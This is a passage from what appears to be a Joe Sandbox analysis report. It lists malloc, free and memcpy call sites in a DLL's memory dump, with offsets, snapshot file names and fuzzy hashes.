                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB67D
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CFEB2C9,?,?,?,6CFEB127,?,?,?,?,?,?,?,?,?,6CFEAE52), ref: 6CFEB708
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CFEB127,?,?,?,?,?,?,?,?), ref: 6CFEB74D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3061335427-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CFE6EAB
                                                                                                      • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CFE6EFA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CFE6F1E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFE6F5C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$freememcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 4259248891-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CFA0A4D), ref: 6CFFB5EA
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CFA0A4D), ref: 6CFFB623
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CFA0A4D), ref: 6CFFB66C
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6CFA0A4D), ref: 6CFFB67F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1480856625-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CFCF611
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFCF623
                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CFCF652
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFCF668
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3510742995-0
                                                                                                      • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                      • Instruction ID: f70f0180e868bf91922d4e5df2708a8e70a9bc8f83816e1503b7e6c2c9375c90
                                                                                                      • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                      • Instruction Fuzzy Hash: 75314F71B00215AFD754CF5DCCC0A9BB7B9EB88354B148939FA4A8BB04D631F9448B95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: d4fc5d5e04a3b507b789cc03692ea13e23ea0bfb9bed56dbfa6affa9dcc65dda
                                                                                                      • Instruction ID: 8ea9754768534431cec8cd9b81cff98894fe3d1ef3cec410c9dbbb1dd2c002ff
                                                                                                      • Opcode Fuzzy Hash: d4fc5d5e04a3b507b789cc03692ea13e23ea0bfb9bed56dbfa6affa9dcc65dda
                                                                                                      • Instruction Fuzzy Hash: D7F0F9B26012066BE7018F59DC84A4BB3B9EF45318B100135EA16D3B01F732F918C696
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%